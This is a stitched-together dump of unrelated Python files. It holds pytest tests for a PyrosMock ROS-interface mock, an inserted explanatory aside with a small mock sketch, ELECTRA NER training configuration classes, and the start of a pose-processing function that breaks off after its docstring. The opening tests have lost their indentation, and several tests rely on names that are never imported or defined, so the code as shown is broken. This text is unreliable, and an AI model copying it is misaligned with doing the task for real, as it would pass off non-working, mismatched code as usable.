from pyros_interfaces_mock import PyrosMock, statusecho_topic
import pyzmp
import pytest
### TESTING NODE CREATION / TERMINATION ###
@pytest.mark.timeout(5)
def test_mocknode_creation_termination():
mockn = PyrosMock()
assert not mockn.is_alive()
mockn.start()
try:
assert mockn.is_alive()
finally:
mockn.shutdown()
assert not mockn.is_alive()
@pytest.mark.timeout(5)
def test_mocknode_provide_services(): # Here we check that this node actually provides all the services
mockn = PyrosMock()
assert not mockn.is_alive()
assert hasattr(mockn, 'msg_build')
assert hasattr(mockn, 'topic')
assert hasattr(mockn, 'topics')
assert hasattr(mockn, 'service')
assert hasattr(mockn, 'services')
assert hasattr(mockn, 'param')
assert hasattr(mockn, 'params')
assert hasattr(mockn, 'setup')
mockn.start()
try:
assert mockn.is_alive()
print("Discovering msg_build Service...")
msg_build = pyzmp.discover("msg_build", 5) # we wait a bit to let it time to start
assert msg_build is not None
assert len(msg_build.providers) == 1
print("Discovering topic Service...")
topic = pyzmp.discover("topic", 5) # we wait a bit to let it time to start
assert topic is not None
assert len(topic.providers) == 1
print("Discovering topics Service...")
topic_list = pyzmp.discover("topics", 5) # we wait a bit to let it time to start
assert topic_list is not None
assert len(topic_list.providers) == 1
print("Discovering service Service...")
service = pyzmp.discover("service", 5) # we wait a bit to let it time to start
assert service is not None
assert len(service.providers) == 1
print("Discovering services Service...")
service_list = pyzmp.discover("services", 5) # we wait a bit to let it time to start
assert service_list is not None
assert len(service_list.providers) == 1
print("Discovering param Service...")
param = pyzmp.discover("param", 5) # we wait a bit to let it time to start
assert param is not None
assert len(param.providers) == 1
print("Discovering params Service...")
param_list = pyzmp.discover("params", 5) # we wait a bit to let it time to start
assert param_list is not None
assert len(param_list.providers) == 1
print("Discovering setup Service...")
param_list = pyzmp.discover("setup", 5) # we wait a bit to let it time to start
assert param_list is not None
assert len(param_list.providers) == 1
finally:
mockn.shutdown()
assert not mockn.is_alive()
#TODO change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect(): # Here we check that this node actually detects a topic
mockn = PyrosMock(kwargs={
'services': [],
'publishers': ['test_topic'],
'subscribers': [],
'params': []
})
assert not mockn.is_alive()
assert hasattr(mockn, 'topics')
# starting the node
mockn.start()
# checking interface is still None here ( instantiated in child only )
assert mockn.interface is None
# Services are initialized in run() method of pyzmp.Node, after interface has been initialized
try:
assert mockn.is_alive()
with mock_publisher_remote('test_topic', statusecho_topic):
# asserting the mock system has done its job from our point of view at least
assert 'test_topic' in topics_available_remote
assert topics_available_type_remote['test_topic'] == statusecho_topic
# Getting topics list from child process
print("Discovering topics Service...")
topics = pyzmp.discover("topics", 3) # we wait a bit to let it time to start
assert topics is not None
assert len(topics.providers) == 1
time.sleep(mockn.update_interval + 1) # make sure we let update time to kick in
# TODO : change timeout
res = topics.call(recv_timeout=6000000)
# the mock system should have done its job from the other process perspective too
# via multiprocess manager list
assert 'test_topic' in res # topic detected since in list of exposed topics
finally:
mockn.shutdown()
assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_configure_detect():  # Here we check that this node actually detects a topic
    mockn = PyrosMock()
    mockn.configure({
        'SERVICES': [],
        'PUBLISHERS': ['test_topic'],
        'SUBSCRIBERS': [],
        'PARAMS': []
    })
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    # starting the node
    mockn.start()
    # checking the interface is still None here (instantiated in the child only)
    assert mockn.interface is None
    # Services are initialized in the run() method of pyzmp.Node, after the interface has been initialized
    try:
        assert mockn.is_alive()
        with mock_publisher_remote('test_topic', statusecho_topic):
            # assert that the mock system has done its job, from our point of view at least
            assert 'test_topic' in topics_available_remote
            assert topics_available_type_remote['test_topic'] == statusecho_topic
            # Getting the topics list from the child process
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            time.sleep(mockn.update_interval + 1)  # make sure we give the update time to kick in
            # TODO: change timeout
            res = topics.call(recv_timeout=6000000)
            # the mock system should have done its job from the other process's perspective too,
            # via the multiprocess manager list
            assert 'test_topic' in res  # topic detected since it is in the list of exposed topics
    finally:
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect_setup():  # Here we check that this node actually detects a topic upon setup
    mockn = PyrosMock()
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    mockn.start()
    try:
        assert mockn.is_alive()
        with mock_publisher_remote('test_topic', statusecho_topic):
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            res = topics.call()
            assert 'test_topic' not in res  # topic not detected since it is not in the list of exposed topics
            print("Discovering setup Service...")
            setup = pyzmp.discover("setup", 3)  # we wait a bit to give it time to start
            assert setup is not None
            assert len(setup.providers) == 1
            setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
            time.sleep(mockn.update_interval + 1)  # waiting for the update to kick in
            res = topics.call()
            assert 'test_topic' in res
    finally:
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_publishers_detect_throttled():
    """
    Testing that the mocknode detection of topics is throttled properly
    :return:
    """
    mockn = PyrosMock()
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    mockn.update_interval = 5  # we wait 5 seconds between each update_throttled call
    mockn.start()  # one update will be triggered, and then nothing for the next 10 seconds
    try:
        assert mockn.is_alive()
        print("Discovering setup Service...")
        setup = pyzmp.discover("setup", 3)  # we wait a bit to give it time to start
        assert setup is not None
        assert len(setup.providers) == 1
        setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
        with mock_publisher_remote('test_topic', statusecho_topic):
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            # the topic is very likely not detected yet (we didn't wait after creating and exposing it)
            res = topics.call()
            assert 'test_topic' not in res
            time.sleep(mockn.update_interval + 1)  # make sure we give the update time to kick in
            # the topic has to be detected now
            res = topics.call()
            assert 'test_topic' in res
    finally:  # to make sure we clean up on failure
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect():  # Here we check that this node actually detects a topic
    mockn = PyrosMock(kwargs={
        'services': [],
        'publishers': [],
        'subscribers': ['test_topic'],
        'params': []
    })
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    # starting the node
    mockn.start()
    # checking the interface is still None here (instantiated in the child only)
    assert mockn.interface is None
    # Services are initialized in the run() method of pyzmp.Node, after the interface has been initialized
    try:
        assert mockn.is_alive()
        with mock_subscriber_remote('test_topic', statusecho_topic):
            # assert that the mock system has done its job, from our point of view at least
            assert 'test_topic' in topics_available_remote
            assert topics_available_type_remote['test_topic'] == statusecho_topic
            # Getting the topics list from the child process
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            time.sleep(mockn.update_interval + 1)  # make sure we give the update time to kick in
            res = topics.call(recv_timeout=6000000)
            # the mock system should have done its job from the other process's perspective too,
            # via the multiprocess manager list
            assert 'test_topic' in res  # topic detected since it is in the list of exposed topics
    finally:
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_configure_detect():  # Here we check that this node actually detects a topic
    mockn = PyrosMock()
    mockn.configure({
        'SERVICES': [],
        'PUBLISHERS': [],
        'SUBSCRIBERS': ['test_topic'],
        'PARAMS': []
    })
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    # starting the node
    mockn.start()
    # checking the interface is still None here (instantiated in the child only)
    assert mockn.interface is None
    # Services are initialized in the run() method of pyzmp.Node, after the interface has been initialized
    try:
        assert mockn.is_alive()
        with mock_subscriber_remote('test_topic', statusecho_topic):
            # assert that the mock system has done its job, from our point of view at least
            assert 'test_topic' in topics_available_remote
            assert topics_available_type_remote['test_topic'] == statusecho_topic
            # Getting the topics list from the child process
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            time.sleep(mockn.update_interval + 1)  # make sure we give the update time to kick in
            res = topics.call(recv_timeout=6000000)
            # the mock system should have done its job from the other process's perspective too,
            # via the multiprocess manager list
            assert 'test_topic' in res  # topic detected since it is in the list of exposed topics
    finally:
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect_setup():  # Here we check that this node actually detects a topic upon setup
    mockn = PyrosMock()
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    mockn.start()
    try:
        assert mockn.is_alive()
        with mock_subscriber_remote('test_topic', statusecho_topic):
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            res = topics.call()
            assert 'test_topic' not in res  # topic not detected since it is not in the list of exposed topics
            print("Discovering setup Service...")
            setup = pyzmp.discover("setup", 3)  # we wait a bit to give it time to start
            assert setup is not None
            assert len(setup.providers) == 1
            setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
            time.sleep(mockn.update_interval + 1)  # waiting for the update to kick in
            res = topics.call()
            assert 'test_topic' in res
    finally:
        mockn.shutdown()
        assert not mockn.is_alive()


# TODO: change it
@pytest.mark.timeout(6000000)
def test_mocknode_subscribers_detect_throttled():
    """
    Testing that the mocknode detection of topics is throttled properly
    :return:
    """
    mockn = PyrosMock()
    assert not mockn.is_alive()
    assert hasattr(mockn, 'topics')
    mockn.update_interval = 5  # we wait 5 seconds between each update_throttled call
    mockn.start()  # one update will be triggered, and then nothing for the next 10 seconds
    try:
        assert mockn.is_alive()
        print("Discovering setup Service...")
        setup = pyzmp.discover("setup", 3)  # we wait a bit to give it time to start
        assert setup is not None
        assert len(setup.providers) == 1
        setup.call(kwargs={'services': [], 'topics': ['test_topic'], 'params': []})
        with mock_subscriber_remote('test_topic', statusecho_topic):
            print("Discovering topics Service...")
            topics = pyzmp.discover("topics", 3)  # we wait a bit to give it time to start
            assert topics is not None
            assert len(topics.providers) == 1
            # the topic is very likely not detected yet (we didn't wait after creating and exposing it)
            res = topics.call()
            assert 'test_topic' not in res
            time.sleep(mockn.update_interval + 1)  # make sure we give the update time to kick in
            # the topic has to be detected now
            res = topics.call()
            assert 'test_topic' in res
    finally:  # to make sure we clean up on failure
        mockn.shutdown()
        assert not mockn.is_alive()


def test_msg_build():
    msg = PyrosMock().msg_build('fake_connec_name')
    print("msg is of type {0}".format(type(msg)))
    assert isinstance(msg, str)


def test_echo_topic_default():
    mock = PyrosMock()
    recv_msg = mock.topic('random_topic')
    assert recv_msg is None


def test_echo_same_topic():
    msg = 'testing'
    mock = PyrosMock()
    mock.topic('random_topic', msg)
    print("msg sent is {0}".format(msg))
    recv_msg = mock.topic('random_topic')
    print("msg received is {0}".format(recv_msg))
    assert msg == recv_msg


def test_other_topic():
    msg = 'testing'
    mock = PyrosMock()
    mock.topic('random_topic', msg)
    print("msg sent is {0}".format(msg))
    recv_msg = mock.topic('random_topic_2')
    print("msg received is {0}".format(recv_msg))
    assert recv_msg is None


def test_echo_service_default():
    mock = PyrosMock()
    assert mock.service('random_service') is None


def test_echo_service():
    msg = 'testing'
    mock = PyrosMock()
    print("msg sent is {0}".format(msg))
    recv_msg = mock.service('random_service', msg)
    print("msg received is {0}".format(recv_msg))
    assert msg == recv_msg


class TestPyrosMockProcess(object):

    mockInstance = None

    @classmethod
    def setup_class(cls):
        cls.mockInstance = PyrosMock()
        assert cls.mockInstance.start()

    @classmethod
    def teardown_class(cls):
        cls.mockInstance.shutdown()

    def test_msg_build(self):
        msg_build_svc = pyzmp.Service.discover('msg_build', 5)
        assert msg_build_svc is not None
        assert self.mockInstance not in msg_build_svc.providers
        resp = msg_build_svc.call(args=('fake_connec_name',))
        assert isinstance(resp, str)

    def test_list_topic(self):
        list_topic_svc = pyzmp.Service.discover('topics', 5)
        assert list_topic_svc is not None
        assert self.mockInstance not in list_topic_svc.providers
        resp = list_topic_svc.call()
        assert resp is not None

    def test_echo_topic(self):
        topic_svc = pyzmp.Service.discover('topic', 5)
        assert topic_svc is not None
        assert self.mockInstance not in topic_svc.providers
        resp = topic_svc.call(args=('random_topic', 'testing'))
        assert resp is None  # message consumed
        resp = topic_svc.call(args=('random_topic', None))
        assert resp == 'testing'  # message echoed

    def test_other_topic(self):
        topic_svc = pyzmp.Service.discover('topic', 5)
        assert topic_svc is not None
        assert self.mockInstance not in topic_svc.providers
        resp = topic_svc.call(args=('random_topic', 'testing'))
        assert resp is None  # message consumed
        resp = topic_svc.call(args=('random_topic_2', None))
        assert resp is None  # message not echoed

    def test_list_service(self):
        service_svc = pyzmp.Service.discover('services', 5)
        assert service_svc is not None
        assert self.mockInstance not in service_svc.providers
        resp = service_svc.call()
        assert resp is not None

    def test_echo_service(self):
        service_svc = pyzmp.Service.discover('service', 5)
        assert service_svc is not None
        assert self.mockInstance not in service_svc.providers
        resp = service_svc.call(args=('random_service', 'testing'))
        assert resp == 'testing'  # message echoed

# TODO: Check that if a service is called inappropriately, the exception is properly transferred back to the calling process and re-raised.

# Just in case we run this directly
if __name__ == '__main__':
    import pytest
    pytest.main([
        '-s', __file__,
    ])
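The echo semantics these tests assert (a message stored on a topic is returned by a later read of the same topic, while an unknown topic returns None, and the storing call itself returns None) can be sketched with a minimal stand-in. `EchoTopicMock` below is a hypothetical illustration of that contract, not the actual `PyrosMock` implementation:

```python
class EchoTopicMock:
    """Hypothetical stand-in mirroring the echo-topic behavior the tests above assert."""

    def __init__(self):
        self._messages = {}

    def topic(self, name, msg=None):
        if msg is not None:
            self._messages[name] = msg  # store the message; the storing call returns None ("consumed")
            return None
        return self._messages.get(name)  # echo the last stored message, or None for an unknown topic


mock = EchoTopicMock()
assert mock.topic('random_topic', 'testing') is None  # message consumed
assert mock.topic('random_topic') == 'testing'        # message echoed
assert mock.topic('random_topic_2') is None           # other topic: nothing echoed
```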


# ---- configs/WNUT_MRC_configs.py (JRC1995/SocialMediaNER, MIT license) ----

class ELECTRA_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # BiLSTM config
        self.use_BiLSTM = False
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = False
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = True
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-MRC)'


class ELECTRA_DSC_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # BiLSTM config
        self.use_BiLSTM = False
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = False
        self.use_DSC = True
        # fine-tune / embedding training
        self.fine_tune_style = True
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 8
        self.val_batch_size = 8
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-DSC-MRC)'


class ELECTRA_SL_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # BiLSTM config
        self.use_BiLSTM = False
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = True
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-SL-MRC)'


class ELECTRA_CRF_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # BiLSTM config
        self.use_BiLSTM = False
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = True
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = True
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-CRF-MRC)'


class ELECTRA_BiLSTM_natural_query_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = True
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = False
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-natural-query)'


class ELECTRA_BiLSTM_SL_natural_query_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = True
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-SL-natural-query)'


class ELECTRA_BiLSTM_CRF_natural_query_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = True
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = True
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-CRF-natural-query)'


class ELECTRA_BiLSTM_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = False
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = False
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-MRC)'


class ELECTRA_BiLSTM_SL_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = False
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = False
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-SL-MRC)'


class ELECTRA_BiLSTM_CRF_MRC_config:
    def __init__(self):
        # basic embedding config
        self.embedding_path = 'embeddings/ELECTRA/'
        self.BigTransformerDim = 1024
        self.layer_num = 24
        self.pool_type = 'mean'
        # layer aggregation / layer selection config
        self.aggregate_layers = True
        self.aggregate_num = 12
        self.select_a_particular_layer = False
        self.select_num = 18
        # query embeddings
        self.use_pretrained_query_embedding = False
        self.query_dim = 128
        # BiLSTM config
        self.use_BiLSTM = True
        self.BiLSTM_input_dropconnect = 0.0
        self.BiLSTM_hidden_dropconnect = 0.0
        self.BiLSTM_zoneout = 0.0
        self.word_dropout = 0.05
        self.hidden_size = 256
        self.BiLSTM_in_dropout = 0.5
        self.BiLSTM_out_dropout = 0.5
        # loss config
        self.use_CRF = True
        self.use_sequence_label = True
        self.use_DSC = False
        # fine-tune / embedding training
        self.fine_tune_style = False
        # optimizer settings
        self.fine_tune_lr = 2e-5
        self.lr = 1e-3
        self.wd = 1e-3
        self.use_gc = True  # gradient centralization
        # training settings
        self.total_batch_size = 32
        self.train_batch_size = 16
        self.val_batch_size = 16
        self.early_stop_patience = 3
        self.max_grad_norm = 5
        self.epochs = 100
        self.model_name = '(ELECTRA-BiLSTM-CRF-MRC)'
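One detail these configs share: `train_batch_size` always divides `total_batch_size`, which suggests the training loop reaches the effective batch size via gradient accumulation over smaller per-step batches. A minimal sketch of that relationship follows; `ExampleConfig` and `gradient_accumulation_steps` are hypothetical illustrations, not part of this repo:

```python
class ExampleConfig:
    """Hypothetical config mirroring the batch-size fields of the classes above."""

    def __init__(self):
        self.total_batch_size = 32
        self.train_batch_size = 16


def gradient_accumulation_steps(config):
    # number of forward/backward passes accumulated before each optimizer step
    assert config.total_batch_size % config.train_batch_size == 0
    return config.total_batch_size // config.train_batch_size


assert gradient_accumulation_steps(ExampleConfig()) == 2
```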


# ---- process_pose_data/process.py (WildflowerSchools/wf-process-pose-data, MIT license) ----

import process_pose_data.overlay
import poseconnect.reconstruct
import poseconnect.track
import poseconnect.identify
import honeycomb_io
import video_io
import pandas as pd
import tqdm
from uuid import uuid4
import multiprocessing
import functools
import logging
import datetime
import time
logger = logging.getLogger(__name__)
def extract_poses_2d_alphapose_local_by_time_segment(
    start,
    end,
    base_dir,
    environment_id,
    camera_assignment_ids=None,
    alphapose_subdirectory='prepared',
    tree_structure='file-per-frame',
    poses_2d_file_name='alphapose-results.json',
    poses_2d_json_format='cmu',
    pose_processing_subdirectory='pose_processing',
    client=None,
    uri=None,
    token_uri=None,
    audience=None,
    client_id=None,
    client_secret=None,
    task_progress_bar=False,
    notebook=False
):
    """
    Fetches 2D pose data from local Alphapose output and writes it back to local files.

    Input data is assumed to be organized according to standard Alphapose
    pipeline output (see documentation for that pipeline).

    If camera assignment IDs are not specified, the function will query Honeycomb
    for cameras assigned to the specified environment over the specified period.

    Output data is organized into 10 second segments (mirroring source videos),
    saved as
    \'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/YYYY/MM/DD/HH-MM-SS/poses_2d_INFERENCE_ID.pkl\'

    Output metadata is saved as
    \'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_extraction_2d/ENVIRONMENT_ID/pose_extraction_2d_metadata_INFERENCE_ID.pkl\'

    Args:
        start (datetime): Start of period to be analyzed
        end (datetime): End of period to be analyzed
        base_dir (str): Base directory for local data (e.g., \'/data\')
        environment_id (str): Honeycomb environment ID for source environment
        camera_assignment_ids (list of str): Cameras to include (default is None)
        alphapose_subdirectory (str): Subdirectory (under base directory) for Alphapose output (default is \'prepared\')
        poses_2d_file_name (str): Filename for Alphapose data in each directory (default is \'alphapose-results.json\')
        poses_2d_json_format (str): Format of Alphapose results files (default is \'cmu\')
        pose_processing_subdirectory (str): Subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
        client (MinimalHoneycombClient): Honeycomb client (otherwise generates one) (default is None)
        uri (str): Honeycomb URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
        token_uri (str): Honeycomb token URI (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
        audience (str): Honeycomb audience (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
        client_id (str): Honeycomb client ID (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
        client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
        task_progress_bar (bool): Boolean indicating whether script should display a progress bar (default is False)
        notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)

    Returns:
        (str) Locally-generated inference ID for this run (identifies output data)
    """
    if start.tzinfo is None:
        logger.info('Specified start is timezone-naive. Assuming UTC')
